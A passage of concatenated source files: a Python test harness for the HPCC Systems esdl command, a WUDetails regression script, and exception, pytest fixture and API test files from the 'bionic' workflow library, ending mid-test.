import subprocess
import sys
import traceback
from pathlib import Path
DESC = "Test the functioning of the esdl command. Version " + __version__
class DirectoryCompare(filecmp.dircmp):
"""
Compare the content of dir1 and dir2. In contrast with filecmp.dircmp, this
subclass compares the content of files with the same path.
"""
def phase3(self):
"""
Find out differences between common files.
Ensure we are using content comparison with shallow=False.
"""
fcomp = filecmp.cmpfiles(self.left, self.right, self.common_files,
shallow=False)
self.same_files, self.diff_files, self.funny_files = fcomp
class TestRun:
"""Common settings for all TestCases in a run."""
def __init__(self, stats, exe_path, output_base, test_path):
self.exe_path = exe_path
self.output_base = output_base
self.test_path = test_path
self.stats = stats
class TestCaseBase:
"""Settings for a specific test case."""
def __init__(self, run_settings, name, command, esdl_file, service, xsl_path, options=None):
self.run_settings = run_settings
self.name = name
self.command = command
self.esdl_path = (self.run_settings.test_path / 'inputs' / esdl_file)
self.service = service
self.xsl_path = xsl_path
self.options = options
self.output_path = Path(self.run_settings.output_base) / name
self.args = [
str(run_settings.exe_path),
self.command,
self.esdl_path,
self.service,
'--xslt',
self.xsl_path,
'--outdir',
# must contain a trailing slash
str(self.output_path) + '/'
]
if options:
self.args.extend(options)
self.result = None
def run_test(self):
safe_mkdir(self.output_path)
logging.debug("Test %s args: %s", self.name, str(self.args))
self.result = subprocess.run(self.args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if self.result.returncode != 0:
logging.error('Error running "esdl %s" for test "%s": %s', self.command, self.name, self.result.stderr)
success = False
else:
success = self.validate_results()
self.run_settings.stats.add_count(success)
def validate_results(self):
"""Compare test case results to the known key.
Return True if the two are identical or False otherwise.
"""
logging.debug('TestCaseBase implementation called, no comparison run')
return False
class TestCaseXSD(TestCaseBase):
"""Test case for the wsdl or xsd commands.
Both generate a single file output, so test validation compares
the contents of the output file with the key file.
    The path to the xsl files does not include the 'xslt' directory; the
    command assumes it needs to append that directory itself.
"""
def __init__(self, run_settings, name, command, esdl_file, service, xsl_path, options=None):
super().__init__(run_settings, name, command, esdl_file, service, xsl_path, options)
def validate_results(self):
"""Compare test case results to the known key.
Return True if the two are identical or False otherwise.
"""
suffix = '.' + self.command
outName = (self.output_path / self.service.lower()).with_suffix(suffix)
key = (self.run_settings.test_path / 'key' / self.name).with_suffix(suffix)
if (not key.exists()):
logging.error('Missing key file %s', str(key))
return False
if (not outName.exists()):
logging.error('Missing output for test %s', self.name)
return False
if (not filecmp.cmp(str(key), str(outName))):
logging.debug('Comparing key %s to output %s', str(key), str(outName))
logging.error('Test failed: %s', self.name)
return False
else:
logging.debug('Passed: %s', self.name)
return True
class TestCaseCode(TestCaseBase):
"""Test case for the cpp or java commands.
Both generate a directory full of output, so test validation compares
the contents of the output directory with the key directory.
    The path to the xsl files must be appended with 'xslt/' for the command
to find the xslt files.
"""
def __init__(self, run_settings, name, command, esdl_file, service, xsl_path, options=None):
        # The xsl path must end in a slash; the esdl command doesn't
        # add one before appending the file name.
xsl_cpp_path = str((xsl_path / 'xslt'))
xsl_cpp_path += '/'
super().__init__(run_settings, name, command, esdl_file, service, xsl_cpp_path, options)
def is_same(self, dir1, dir2):
"""
Compare two directory trees content.
        Return False if they differ, True if they are the same.
"""
compared = DirectoryCompare(dir1, dir2)
if (compared.left_only or compared.right_only or compared.diff_files
or compared.funny_files):
return False
for subdir in compared.common_dirs:
if not self.is_same(os.path.join(dir1, subdir), os.path.join(dir2, subdir)):
return False
return True
def validate_results(self):
# output of cpp or java is a directory named 'source'
outName = (self.output_path / 'source')
key = (self.run_settings.test_path / 'key' / self.name)
if (not key.exists()):
logging.error('Missing key file %s', str(key))
return False
if (not outName.exists()):
logging.error('Missing output for test %s', self.name)
return False
if (not self.is_same(str(key), str(outName))):
logging.debug('Comparing key %s to output %s', str(key), str(outName))
logging.error('Test failed: %s', self.name)
return False
else:
logging.debug('Passed: %s', self.name)
return True
class Statistics:
def __init__(self):
self.successCount = 0
self.failureCount = 0
def add_count(self, success):
if (success):
self.successCount += 1
else:
self.failureCount += 1
def parse_options():
"""Parse any command-line options given returning both
the parsed options and arguments.
"""
parser = argparse.ArgumentParser(description=DESC)
parser.add_argument('testroot',
help='Path of the root folder of the esdlcmd testing project')
parser.add_argument('-o', '--outdir',
help='Directory name of output for tests',
default='esdlcmd-test-output')
parser.add_argument('-e', '--esdlpath',
help='Path to the esdl executable to test')
parser.add_argument('-x', '--xslpath',
help='Path to the folder containing xslt/*.xslt transforms',
default='/opt/HPCCSystems/componentfiles/')
parser.add_argument('-d', '--debug',
help='Enable debug logging of test cases',
action='store_true', default=False)
args = parser.parse_args()
return args
def safe_mkdir(path):
"""Create a new directory, catching all exceptions.
The directory may already exist, and any missing intermediate
directories are created. The script is exited if unrecoverable
exceptions are caught.
"""
try:
path.mkdir(parents=True, exist_ok=True)
except FileExistsError as e:
pass
except (FileNotFoundError, PermissionError) as e:
logging.error("'%s' \nExit." % (str(e)))
exit(-1)
except:
print("Unexpected error:"
+ str(sys.exc_info()[0])
+ " (line: "
+ str(inspect.stack()[0][2])
+ ")" )
traceback.print_stack()
exit(-1)
def main():
args = parse_options()
stats = Statistics()
test_path = Path(args.testroot)
exe_path = Path(args.esdlpath) / 'esdl'
xsl_base_path = Path(args.xslpath)
if (args.debug):
loglevel = logging.DEBUG
else:
loglevel=logging.INFO
logging.basicConfig(level=loglevel, format='[%(levelname)s] %(message)s')
stats = Statistics()
run_settings = TestRun(stats, exe_path, args.outdir, test_path)
test_cases = [
# wsdl
TestCaseXSD(run_settings, 'wstest-wsdl-default', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path),
TestCaseXSD(run_settings, 'wstest-wsdl-noarrayof', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['--no-arrayof']),
TestCaseXSD(run_settings, 'wstest-wsdl-iv1', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1']),
TestCaseXSD(run_settings, 'wstest-wsdl-iv2', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '2']),
TestCaseXSD(run_settings, 'wstest-wsdl-iv3', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '3']),
TestCaseXSD(run_settings, 'wstest-wsdl-uvns', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '3', '-uvns']),
TestCaseXSD(run_settings, 'wstest-wsdl-allannot', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['--annotate', 'all']),
TestCaseXSD(run_settings, 'wstest-wsdl-noannot', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1', '--annotate', 'none']), # -iv for smaller output
TestCaseXSD(run_settings, 'wstest-wsdl-opt', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1', '-opt', 'developer']),
# --noopt isn't fully implemented, enable test case once it is
#TestCaseXSD(run_settings, 'wstest-wsdl-noopt', 'wsdl', 'ws_test.ecm', 'WsTest',
# xsl_base_path, ['-iv', '1', '--noopt']),
TestCaseXSD(run_settings, 'wstest-wsdl-tns', 'wsdl', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1', '-tns', 'urn:passed:name:space']),
# xsd
TestCaseXSD(run_settings, 'wstest-xsd-default', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path),
TestCaseXSD(run_settings, 'wstest-xsd-noarrayof', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['--no-arrayof']),
TestCaseXSD(run_settings, 'wstest-xsd-iv1', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1']),
TestCaseXSD(run_settings, 'wstest-xsd-iv2', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '2']),
TestCaseXSD(run_settings, 'wstest-xsd-iv3', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '3']),
TestCaseXSD(run_settings, 'wstest-xsd-uvns', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '3', '-uvns']),
TestCaseXSD(run_settings, 'wstest-xsd-allannot', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['--annotate', 'all']),
TestCaseXSD(run_settings, 'wstest-xsd-noannot', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1', '--annotate', 'none']), # -iv for smaller output
TestCaseXSD(run_settings, 'wstest-xsd-opt', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1', '-opt', 'developer']),
# --noopt isn't fully implemented, enable test case once it is
#TestCaseXSD(run_settings, 'wstest-xsd-noopt', 'xsd', 'ws_test.ecm', 'WsTest',
# xsl_base_path, ['-iv', '1', '--noopt']),
TestCaseXSD(run_settings, 'wstest-xsd-tns', 'xsd', 'ws_test.ecm', 'WsTest',
xsl_base_path, ['-iv', '1', '-tns', 'urn:passed:name:space']),
# cpp
TestCaseCode(run_settings, 'wstest-cpp-installdir', 'cpp', 'ws_test.ecm', 'WsTest',
xsl_base_path)
]
for case in test_cases:
case.run_test()
logging.info('Success count: %d', stats.successCount)
logging.info('Failure count: %d', stats.failureCount)
if __name__ == "__main__":
main()
```
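A hypothetical way to drive the test script above from Python (all paths are placeholders; the flags mirror those defined in `parse_options`):
```python
# Runs esdlcmd-test.py against a checkout of the esdlcmd testing project,
# pointing -e at the directory assumed to contain the 'esdl' executable and
# enabling per-test debug logging with -d.
import subprocess

subprocess.run([
    'python3', 'esdlcmd-test.py',
    '/path/to/esdlcmd-testing',    # positional testroot argument
    '-e', '/opt/HPCCSystems/bin',  # assumed location of the esdl binary
    '-d',
], check=True)
```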
#### File: esp/wudetails/wutest.py
```python
import wucommon
import logging
import filecmp
from wucommon import TestCase
def execTestCase(jobname, wuid, tcase, tcasename):
testfilename = jobname + '_' + tcasename
logging.debug('Executing %s',testfilename)
wuresp = wutest.makeWuDetailsRequest(testfilename, wuid, tcase)
outfile = (wutest.resultdir / testfilename).with_suffix('.json')
if (outfile.exists()): outfile.unlink()
with outfile.open(mode='w') as f:
print (tcase, file=f)
print (wuresp, file=f)
keyfile = (wutest.tcasekeydir / testfilename).with_suffix('.json')
if (not keyfile.exists()):
logging.error('Missing key file %s', str(keyfile))
return False
    # Compare actual and expected output
if (not filecmp.cmp(str(outfile),str(keyfile))):
logging.error('Regression check Failed: %s', testfilename)
return False
else:
logging.debug('PASSED %s', testfilename)
return True
###############################################################################
print('WUDetails Regression (wutest.py)')
print('--------------------------------')
print('')
requiredJobs = ( ('childds1', ('roxie','thor','hthor')),
('dedup_all', ('roxie','hthor')),
('sort', ('roxie','thor','hthor')),
('key', ('roxie','thor','hthor')),
('dict1', ('roxie','thor','hthor')),
('indexread2-multiPart(true)',('roxie', 'thor','hthor')),
('sets', ('roxie','thor','hthor')) )
maskFields = ('Definition','DefinitionList','SizePeakMemory', 'WhenFirstRow', 'TimeElapsed', 'TimeTotalExecute', 'TimeFirstExecute', 'TimeLocalExecute',
'WhenStarted', 'TimeMinLocalExecute', 'TimeMaxLocalExecute', 'TimeAvgLocalExecute', 'SkewMinLocalExecute', 'SkewMaxLocalExecute',
'NodeMaxLocalExecute', 'NodeMaxDiskWrites', 'NodeMaxLocalExecute', 'NodeMaxLocalExecute', 'NodeMaxSortElapsed', 'NodeMinDiskWrites',
'NodeMinLocalExecute', 'NodeMinLocalExecute', 'NodeMinLocalExecute', 'NodeMinSortElapsed', 'SkewMaxDiskWrites', 'SkewMaxLocalExecute',
'SkewMaxLocalExecute', 'SkewMaxSortElapsed', 'SkewMinDiskWrites', 'SkewMinLocalExecute', 'SkewMinLocalExecute', 'SkewMinSortElapsed',
'TimeAvgSortElapsed', 'TimeMaxSortElapsed', 'TimeMinSortElapsed')
maskMeasureTypes = ('ts','ns', 'skw', 'node')
wutest = wucommon.WuTest(maskFields, maskMeasureTypes, True, True)
scopeFilter = wutest.scopeFilter
nestedFilter = wutest.nestedFilter
propertiesToReturn = wutest.propertiesToReturn
scopeOptions = wutest.scopeOptions
propertyOptions = wutest.propertyOptions
extraProperties = wutest.extraProperties
# Test cases
#scopeFilter(MaxDepth='999', Scopes=set(), Ids=set(), ScopeTypes=set()),
#nestedFilter(Depth='999', ScopeTypes=set()),
#propertiesToReturn(AllProperties='1', MinVersion='0', Measure='', Properties=set(), ExtraProperties=set()),
#scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
#propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeFormatted='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
TestCases = [
TestCase(
scopeFilter(MaxDepth='999'),
nestedFilter(),
propertiesToReturn(AllProperties='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeFormatted='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999'),
nestedFilter(),
propertiesToReturn(AllStatistics='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999'),
nestedFilter(),
propertiesToReturn(AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999'),
nestedFilter(),
propertiesToReturn(AllHints='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', Scopes={'Scope':'w1:graph1'}),
nestedFilter(),
propertiesToReturn(AllProperties='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='1', ScopeTypes={'ScopeType':'graph'}),
nestedFilter(Depth='1'),
propertiesToReturn(AllProperties='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'global'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'activity'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'allocator'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='2'),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions()
),
TestCase(
scopeFilter(MaxDepth='1'),
nestedFilter(Depth='1'),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(),
propertyOptions()
),
TestCase(
scopeFilter(MaxDepth='2'),
nestedFilter(),
propertiesToReturn(Properties={'Property':['WhenStarted','WhenCreated']}),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions()
),
TestCase(
scopeFilter(MaxDepth='2'),
nestedFilter(),
propertiesToReturn(Measure='ts'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='2'),
nestedFilter(),
propertiesToReturn(Measure='cnt'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions()
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeScope='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeId='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='0')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeRawValue='1')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeMeasure='0')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeCreator='0')
),
TestCase(
scopeFilter(MaxDepth='999', ScopeTypes={'ScopeType':'subgraph'}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeCreatorType='0')
),
TestCase(
scopeFilter(MaxDepth='2', Scopes={'Scope':'w1:graph1:sg1'}),
nestedFilter(Depth=0),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='2', Scopes={'Scope':'w1:graph1:sg1'}),
nestedFilter(Depth=1),
propertiesToReturn(Properties={'Property':['WhenStarted','WhenCreated']}, ExtraProperties={'Extra':{'scopeType':'edge','Properties':{'Property':['NumStarts','NumStops']}}}),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', PropertyFilters={'PropertyFilter':{'Name':'NumRowsProcessed','MinValue':'10000','MaxValue':'20000'}}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', PropertyFilters={'PropertyFilter':{'Name':'NumIndexSeeks','MaxValue':'3'}}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', PropertyFilters={'PropertyFilter':{'Name':'NumIndexSeeks','ExactValue':'4'}}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(MaxDepth='999', PropertyFilters={'PropertyFilter':[{'Name':'NumIndexSeeks','ExactValue':'4'},{'Name':'NumAllocations','MinValue':'5','MaxValue':'10'}]}),
nestedFilter(),
propertiesToReturn(AllStatistics='1', AllAttributes='1'),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(ScopeTypes={'ScopeType':'workflow'}, MaxDepth='999',),
nestedFilter(Depth='0'),
propertiesToReturn(AllAttributes='1', Properties=[{'Property':'IdDependencyList'}]),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
TestCase(
scopeFilter(ScopeTypes={'ScopeType':'workflow'}, MaxDepth='999',),
nestedFilter(Depth='0'),
propertiesToReturn(Properties=[{'Property':'IdDependency'}]),
scopeOptions(IncludeMatchedScopesInResults='1', IncludeScope='1', IncludeId='1', IncludeScopeType='1'),
propertyOptions(IncludeName='1', IncludeRawValue='1', IncludeMeasure='1', IncludeCreator='1', IncludeCreatorType='1')
),
]
logging.info('Gathering workunits')
wu = wutest.getTestWorkunits(requiredJobs)
logging.info('Matched job count: %d', wutest.getMatchedJobCount())
if (wutest.getMatchedJobCount()==0):
logging.error('There are no matching jobs. Has the regression suite been executed?')
logging.error('Aborting')
exit(1)
missingjobs = wutest.getMissingJobCount(requiredJobs)
if (missingjobs > 0):
logging.warning('There are %d missing jobs. Full regression will not be executed', missingjobs)
logging.info('Executing regression test cases')
stats = wucommon.Statistics()
for jobname, wuid in wu.items():
logging.debug('Job %s (WUID %s)', jobname, wuid)
if (jobname == 'sort_thor'):
for index, t in enumerate(TestCases):
tcasename = 'testcase' + str(index+1)
success = execTestCase(jobname, wuid, t, tcasename)
stats.addCount(success)
elif (jobname in ['sets_thor','sets_roxie', 'sets_hthor']):
success = execTestCase(jobname, wuid, TestCases[30], 'testcase31')
stats.addCount(success)
success = execTestCase(jobname, wuid, TestCases[31], 'testcase32')
stats.addCount(success)
else:
success = execTestCase(jobname, wuid, TestCases[0], 'testcase1')
stats.addCount(success)
logging.info('Success count: %d', stats.successCount)
logging.info('Failure count: %d', stats.failureCount)
```
|
{
"source": "jecorona97/bionic",
"score": 2
}
|
#### File: bionic/bionic/exception.py
```python
class UndefinedEntityError(KeyError):
@classmethod
def for_name(cls, name):
return cls("Entity %r is not defined" % name)
class AlreadyDefinedEntityError(ValueError):
@classmethod
def for_name(cls, name):
return cls("Entity %r is already defined" % name)
class IncompatibleEntityError(ValueError):
pass
class UnsupportedSerializedValueError(Exception):
pass
class CodeVersioningError(Exception):
pass
```
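A short sketch of how the `for_name` factories read at a call site (the entity names here are hypothetical):
```python
# Hypothetical usage of the exception factories defined above.
from bionic.exception import UndefinedEntityError

def check_defined(defined_names, name):
    if name not in defined_names:
        raise UndefinedEntityError.for_name(name)

try:
    check_defined({'x', 'y'}, 'z')
except UndefinedEntityError as e:
    # UndefinedEntityError subclasses KeyError, so str(e) shows the
    # message "Entity 'z' is not defined" wrapped in quotes.
    print(e)
```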
#### File: bionic/tests/conftest.py
```python
import pytest
import bionic as bn
# We provide this at the top level because we want everyone using FlowBuilder
# to use a temporary directory rather than the default one.
@pytest.fixture(scope='function')
def builder(tmp_path):
builder = bn.FlowBuilder('test')
builder.set(
'core__persistent_cache__flow_dir', str(tmp_path / 'BNTESTDATA'))
return builder
# These three functions add a --slow command line option to enable slow tests.
# Seems involved, but it's the approach recommended in the pytest docs.
def pytest_addoption(parser):
parser.addoption(
'--slow', action='store_true', default=False, help='run slow tests'
)
def pytest_configure(config):
config.addinivalue_line('markers', 'slow: mark test as slow to run')
def pytest_collection_modifyitems(config, items):
if config.getoption('--slow'):
# If the option is present, don't skip slow tests.
return
skip_slow = pytest.mark.skip(reason='only runs when --slow is set')
for item in items:
if 'slow' in item.keywords:
item.add_marker(skip_slow)
```
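Given those hooks, a test opts into the slow group with the registered marker and is skipped unless `pytest --slow` is passed (a minimal sketch, assuming it lives in the same test suite):
```python
import time
import pytest

@pytest.mark.slow
def test_expensive_path():
    # Skipped by default; runs only when --slow is set.
    time.sleep(5)
    assert True
```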
#### File: tests/test_flow/test_api.py
```python
import pytest
from pytest import raises
import pandas as pd
import bionic as bn
from bionic.exception import (
UndefinedEntityError, AlreadyDefinedEntityError, IncompatibleEntityError)
from ..helpers import count_calls
@pytest.fixture(scope='function')
def preset_builder(builder):
builder.declare('x')
builder.assign('y', 1)
builder.assign('z', values=[2, 3])
@builder
def f(x, y):
return x + y
@builder
def g(y, z):
return y + z
builder.declare('p')
builder.declare('q')
builder.add_case('p', 4, 'q', 5)
@builder
@bn.outputs('y_plus', 'y_plus_plus')
def y_pluses(y):
return (y + 1), (y + 2)
return builder
@pytest.fixture(scope='function')
def preset_flow(preset_builder):
return preset_builder.build()
# -- Builder API tests.
def test_declare(preset_builder):
builder = preset_builder
builder.declare('w')
builder.set('w', 7)
assert builder.build().get('w') == 7
with raises(AlreadyDefinedEntityError):
builder.declare('x')
with raises(AlreadyDefinedEntityError):
builder.declare('y')
with raises(AlreadyDefinedEntityError):
builder.declare('z')
def test_declare_protocol(builder):
protocol = bn.protocol.dillable()
builder.declare('n', protocol=protocol)
assert builder.build().entity_protocol('n') == protocol
def test_set(preset_builder):
builder = preset_builder
builder.set('x', 5)
assert builder.build().get('x') == 5
builder.set('y', 6)
assert builder.build().get('y') == 6
builder.set('z', 7)
assert builder.build().get('z') == 7
builder.set('f', 8)
assert builder.build().get('f') == 8
with pytest.raises(UndefinedEntityError):
builder.set('xxx', 9)
def test_set_multiple(preset_builder):
builder = preset_builder
builder.set('x', values=[5, 6])
assert builder.build().get('x', set) == {5, 6}
builder.set('y', values=[6, 7])
assert builder.build().get('y', set) == {6, 7}
builder.set('z', values=[7, 8])
assert builder.build().get('z', set) == {7, 8}
builder.set('f', values=[8, 9])
assert builder.build().get('f', set) == {8, 9}
def test_assign_single(preset_builder):
builder = preset_builder
builder.assign('w', 7)
assert builder.build().get('w') == 7
with raises(AlreadyDefinedEntityError):
builder.assign('x', 7)
with raises(AlreadyDefinedEntityError):
builder.assign('y', 7)
with raises(AlreadyDefinedEntityError):
builder.assign('z', 7)
with raises(AlreadyDefinedEntityError):
builder.assign('f', 7)
def test_assign_multiple(preset_builder):
builder = preset_builder
builder.assign('w', values=[1, 2])
assert builder.build().get('w', set) == {1, 2}
with raises(AlreadyDefinedEntityError):
builder.assign('x', values=[1, 2])
with raises(AlreadyDefinedEntityError):
builder.assign('y', values=[1, 2])
with raises(AlreadyDefinedEntityError):
builder.assign('z', values=[1, 2])
with raises(AlreadyDefinedEntityError):
builder.assign('f', values=[1, 2])
def test_add_case(preset_builder):
builder = preset_builder
builder.add_case('x', 7)
assert builder.build().get('x', set) == {7}
builder.add_case('x', 8)
